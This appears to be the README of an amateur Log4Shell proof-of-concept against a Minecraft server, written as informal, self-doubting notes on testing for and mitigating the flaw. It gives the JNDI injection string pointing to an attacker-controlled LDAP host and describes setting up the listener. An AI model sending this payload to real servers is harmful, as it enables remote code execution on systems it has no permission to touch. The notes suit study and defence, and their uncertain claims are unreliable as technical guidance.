if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1}
to log4j it somehow loads the class/java bytecode sent by Attacker Controlled LDAP Server. The bytecode could be used to
execute any malicious code or do some little trolling.
take this with grain of salt, I'm not a security expert.
inb4:
Log4Shell.mp4
- Mitigated by deleting
org.apache.logging.log4j.core.lookup.JndiLookupsomehow didn't crash
- Note: 1.16.5 Minecraft Server RCE exploit
Use simple socket to listen on port 1389 then close the socket once its connected no external dependency
-
Note: not always the case, sometimes it doesn't bother to load class url location given by LDAP Server
-
Vulnerable to lookup:
-
Log:
going to throw error if its is vulnerable
Use com.unboundid:unboundid-ldapsdk library to host LDAP server
- Note: doesn't mean it's vulnerable to RCE exploit.
- Vulnerable to lookup:
- LADP Server logs:
Both sender and receiver are logged which mean they are vulnerable
- Note: if it's get logged, doesn't mean it's vulnerable to RCE
- Vulnerable to lookup:
-
if java do LDAP lookup doesn't mean it is always vulnerable, but if is load the classpath provided then it is ?
- vulnerable to RCE and LDAP lookup:
- not vulnerable because java don't fetch bytecode ??, still vulnerable to LDAP lookup:
- vulnerable to RCE and LDAP lookup:
-
to test if it's actually vulnerable to RCE, try to use harmless payloads if its running then its vulnerable.
-
if
com.sun.jndi.ldap.object.trustURLCodebaseproperty is set totruethen you are vulnerable like really else, the attacker can use existing classpath -
if you found the victim log and see this:
Caused by: java.lang.ClassNotFoundException: itzbenz.payload.ObjectPayloadSerializable
at java.net.URLClassLoader.findClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
it's safe because it will not load classpath provided by attacker ?? though it's still doing LDAP lookup which is large attack surface.
note: (after updating java 8, the minecraft server seem not load the classpath)
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.